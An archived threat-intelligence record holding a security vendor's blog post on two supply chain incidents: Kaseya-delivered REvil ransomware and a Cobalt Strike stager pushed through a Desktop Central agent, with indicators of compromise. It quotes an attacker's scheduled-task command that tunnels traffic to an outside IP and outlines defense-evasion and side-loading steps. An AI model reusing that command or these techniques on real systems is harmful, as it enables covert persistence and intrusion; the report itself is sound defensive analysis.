{
	"id": "8701bcad-892d-4852-a0cc-17ad9addefa8",
	"created_at": "2026-04-06T01:32:17.291688Z",
	"updated_at": "2026-04-10T03:20:33.63546Z",
	"deleted_at": null,
	"sha1_hash": "4d3db8c6e736968d37b3c4a586a9d7a5d0ec082b",
	"title": "Supply Chain Attacks from a Managed Detection and Response Perspective",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 704044,
	"plain_text": "Supply Chain Attacks from a Managed Detection and Response Perspective\r\nBy Jessie Prevost, Joelson Soares, Janus Agcaoili\r\nPublished: 2021-08-04 · Archived: 2026-04-06 00:12:33 UTC\r\nMalware\r\nIn this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months.\r\nIntroduction\r\nModern technology has made managing large IT environments much less daunting compared to the past, when each endpoint had to be manually configured and maintained. Many organizations now use tools and IT solutions that allow centralized management of endpoints, making it possible to update, troubleshoot, and deploy applications from a remote location.\r\nHowever, this convenience comes at a price — just as IT staff can access machines from a single location, the centralized nature of modern tech infrastructure also means that malicious actors can target the primary hub to gain access to the whole system. Even more concerning, cybercriminals no longer even have to launch a direct attack against an organization — they can bypass security measures by focusing on their target’s supply chain. For example, instead of trying to find weak points in the system of a large organization that will likely have strong defenses, an attacker can instead target smaller companies that develop software for larger enterprises.\r\nIncident #1: Attack on the Kaseya platform\r\nOn July 2, during the peak of the Kaseya ransomware incident, we alerted one of our customers, notifying them about ransomware detections in their system.\r\nFigure 1. The timeline of the incident\r\nhttps://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\r\nPage 1 of 7\r\nOur investigation found suspicious activity when the file AgentMon.exe, which is part of the Kaseya Agent, spawned another file, cmd.exe, that is responsible for creating the payload agent.exe, which in turn dropped MsMpEng.exe.\r\nBy expanding our root cause analysis (RCA) and checking the argument for cmd.exe, we were able to see a few items before the execution of the ransomware. This initial set of indicators of compromise (IoCs) is similar to the ones discussed in another blog post.\r\nFigure 2. Vision One console showing the attack’s infection chain\r\nWe found that the malware attempted to disable the anti-malware and anti-ransomware features of Windows Defender via PowerShell commands. It also created a copy of the Windows command line program Certutil.exe to “C:\\Windows\\cert.exe”, which is used to decode the payload file agent.crt, with the output given the name agent.exe. Agent.exe is then used to create the file MsMpEng.exe, a version of Windows Defender that is vulnerable to DLL side-loading.\r\nFigure 3. Details of the threat\r\nMachine learning detection capabilities managed to detect and block the ransomware; however, the protection module was not activated in all the security agents of Trend Micro Apex One™, so the organization’s support requested the team to check their product settings. Because the process chain showed that the ransomware came from a Kaseya agent, we requested our customer to isolate the Kaseya servers to contain the threat.\r\nA few hours later, Kaseya released a notice to their users to immediately shut down their Virtual System/Server Administrator (VSA) server until further notice.\r\nIncident #2: Credential dumping attack on the Active Directory\r\nThe second supply chain incident handled by our MDR team starts with an alert to a customer that notified them of a credential dump occurring in their Active Directory (AD). The Incident View in Trend Micro Vision One™️ aggregated other detections into a single view, providing additional information on the scope of the threat. From there, we were able to see a server, an endpoint, and a user related to the threat.\r\nFigure 4. Vision One’s incident view showing the threat’s details\r\nOur threat hunting team also noted suspicious behavior related to WmiExec. Further investigation of the affected hosts’ Ownership Alignment Tools (OATs) shows a related entry for persistence:\r\nC:\\Windows\\System32\\schtasks.exe /CREATE /RU SYSTEM /SC HOURLY /TN \"Windows Defender\" /TR \"powershell.exe C:\\Windows\\System.exe -L rtcp://0.0.0.0:1035/127.0.0.1:25 -F mwss://52.149.228.45:443\" /ST 12:00\r\nFigure 5. OAT flagging a suspicious creation of a scheduled task\r\nWe found scheduled tasks being utilized as a persistence mechanism for the file System.exe. Further analysis of this file shows that it is related to GO simple tunnel, which is used to forward network traffic to an IP address depending on the argument.\r\nChecking the initial alert revealed a file common to the two hosts, which prompted us to check the IoC list to determine the other affected hosts in the environment.\r\nFigure 6. Discovery commands and access to a malicious domain evident in the process chain\r\nExpanding the nodes from the RCA allowed us to gather additional IoCs that showed setup0.exe creating the file elevateutils.exe. In addition, elevateutils.exe was seen querying the domain vmware[.]center, which is possibly the threat’s command-and-control (C\u0026C) server. We also discovered the earliest instance of setup0.exe in one of the hosts.\r\nThe sample setup0.exe is an installer for elevateutils.exe, which, based on our analysis, seems to be a Cobalt Strike Beacon Malleable C\u0026C stager. The installer may have been used to masquerade as a normal file installation.\r\nFigure 7. The presence of EICAR strings is an indicator of elevateutils.exe being a Cobalt Strike Beacon\r\nThe stager elevateutils.exe will try to load the DLL chartdir60.dll, which will in turn read the contents of manual.pdf (these are also dropped by the installer in the same directory as elevateutils.exe). It will then decrypt, load, and execute shellcode in memory that will access the URL vmware[.]center/mV6c.\r\nIt makes use of VirtualAlloc, VirtualProtect, CreateThread, and a function to decrypt the shellcode to load and execute in memory. It also uses indirect API calls after decryption in a separate function, then uses JMP EAX to call the function as needed, which is not a routine or behavior that a normal file should have.\r\nSince it’s possible that this is a Cobalt Strike Malleable C\u0026C stager, further behaviors may be dependent on what is downloaded from the accessed URL. However, because the URL was inaccessible at the time of writing this blog post, we were unable to observe or verify other behaviors.\r\nUse of the Progressive RCA of Vision One allowed us to see how elevateutils.exe was created, as well as its behaviors. The malicious file was deployed via a Desktop Central agent.\r\nFigure 8. Viewing the behaviors of elevateutils.exe\r\nFigure 9. The console showing the attack’s infection chain\r\nBased on these findings, our recommendation to the customer was to check the logon logs of the affected application to verify any suspicious usage of accounts during the time the threat was deployed.\r\nBy closely monitoring the environment, the threat was stopped after the credential dump. Furthermore, the IoCs (IP addresses and hashes) were added to the suspicious objects list to block them while waiting for detections. Further monitoring was done and no other suspicious behavior was seen.\r\nDefending against supply chain attacks\r\nAs businesses become more interconnected, a successful supply chain attack has the potential to cause a significant amount of damage to affected organizations. We can expect to see more of these in the future, as they often lead to the same results as a direct attack while providing a wider attack surface for malicious actors to exploit.\r\nSupply chain attacks are difficult to track because the targeted organizations often do not have full access to what’s going on security-wise with their supply chain partners. This can often be exacerbated by security lapses within the company itself. For example, products and software may have configurations — such as folder exclusions and suboptimal implementation of detection modules — that make threats more difficult to notice.\r\nSecurity audits are also a very important step in securing the supply chain. Even if third-party vendors are known to be trustworthy, security precautions should still be deployed in case there are compromised accounts or even insider threats.\r\nUsing Vision One to contain the threat\r\nTrend Micro Vision One™ offers organizations the ability to detect and respond to threats across multiple security layers. It provides enterprises options to deal with threats such as the ones discussed in this blog entry:\r\nIt can isolate endpoints, which are often the source of infection, until they are fully cleaned or the investigation is done.\r\nIt can block IoCs related to the threat; these include hashes, IP addresses, or domains found during analysis.\r\nIt can collect files for further investigation.\r\nIndicators of Compromise (IoCs)\r\nIncident # 1\r\nSHA256 Detection name Details\r\n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd Ransom.Win32.SODINOKIBI.YABGC mpsvc.\r\nd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e Trojan.Win32.SODINSTALL.YABGC agent.e\r\nIncident # 2\r\nSHA256 Detection name Details\r\n5e0f28bd2d49b73e96a87f5c20283ebe030f4bb39b3107d4d68015dce862991d HackTool.Win64.Gost.A System.exe\r\n116af9afb2113fd96e35661df5def2728e169129bedd6b0bb76d12aaf88ba1ab Trojan.Win32.COBALT.AZ Setup0.exe\r\nf52679c0a6196494bde8b61326d753f86fa0f3fea9d601a1fc594cbf9d778b12 Trojan.Win32.COBALT.BA chartdir60.dll\r\nc59ad626d1479ffc4b6b0c02ca797900a09553e1c6ccfb7323fc1cf6e89a9556 Trojan.PDF.COBALT.AA manual.pdf\r\nf4f25ce8cb5825e0a0d76e82c54c25a2e76be3675b8eeb511e2e8a0012717006 Trojan.Win32.COBALT.BA elevateutils.exe\r\nIP addresses and domains\r\n185[.]215[.]113[.]213\r\nvmware[.]center\r\nSource: https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html"
	],
	"report_names": [
		"supply-chain-attacks-from-a-managed-detection-and-response-persp.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775439137,
	"ts_updated_at": 1775791233,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4d3db8c6e736968d37b3c4a586a9d7a5d0ec082b.pdf",
		"text": "https://archive.orkl.eu/4d3db8c6e736968d37b3c4a586a9d7a5d0ec082b.txt",
		"img": "https://archive.orkl.eu/4d3db8c6e736968d37b3c4a586a9d7a5d0ec082b.jpg"
	}
}